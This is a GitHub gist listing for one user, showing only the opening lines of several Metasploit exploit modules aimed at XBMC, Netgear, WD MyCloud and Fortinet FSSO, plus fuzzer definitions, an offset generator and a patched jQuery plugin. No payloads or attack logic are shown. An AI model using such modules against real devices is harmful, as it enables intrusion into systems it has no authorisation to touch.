@phikshun
phikshun / xbmc_remote_exec.rb
Created February 20, 2014 23:31
XBMC EventServer API Metasploit Module
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'XBMC Remote UDP Code Exec',
phikshun / netgear_telnet_enabler.rb
Created March 18, 2014 23:49
Netgear Telnet Enabler
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
class Blowfish
def setup_blowfish()
@sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
@pArray = INITIALPARRAY.clone
keypos = 0
phikshun / wdmycloud_cmd_injection_csrf.rb
Created March 20, 2014 00:51
WDMyCloud Command Injection CSRF
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'WDMyCloud NAS Command Injection CSRF',
phikshun / fsso.xml
Created March 22, 2015 20:27
Fortinet FSSO Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="FSSO">
<Number name="PktLen" size="32" endian="big">
<Relation type="size" of="Main" expressionSet="size+4" />
</Number>
<Block name="Main">
<Number name="PktTag" valueType="hex" value="80" size="8" endian="big" />
phikshun / dcagent.xml
Created March 29, 2015 19:44
Fortinet FSSO DCAgent Protocol Peach Pit
<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
<DataModel name="DataTSAgent">
<Number name="Length" size="16" endian="big">
<Relation type="size" of="Main" expressionSet="size+2" />
</Number>
<Block name="Main">
<Number name="Timestamp" size="32" valueType="string" value="1420054000" signed="false" endian="big">
phikshun / calc_magic.rb
Created March 29, 2015 20:19
DCAgent Exploit Kernel32.dll Offset Generator
#!/usr/bin/env ruby
require 'pedump'
require 'colorize'
@lang = {
0x0401 => 'ar',
0x0415 => 'pl',
0x0402 => 'bg',
0x0416 => 'pt-br',
phikshun / fsso_buffer_overflow.rb
Created March 29, 2015 20:39
Fortinet FSSO Stack Buffer Overflow Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
phikshun / fsso_dcagent_overflow.rb
Created March 29, 2015 20:23
Fortinet FSSO DCAgent Exploit
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
phikshun / gist:1554071
Created January 3, 2012 08:26
Patched jquery.pjax.js for rails/pjax pjax_redirect_to support.
// jquery.pjax.js
// copyright chris wanstrath
// https://github.com/defunkt/jquery-pjax
(function($){
// When called on a link, fetches the href with ajax into the
// container specified as the first parameter or with the data-pjax
// attribute on the link itself.
//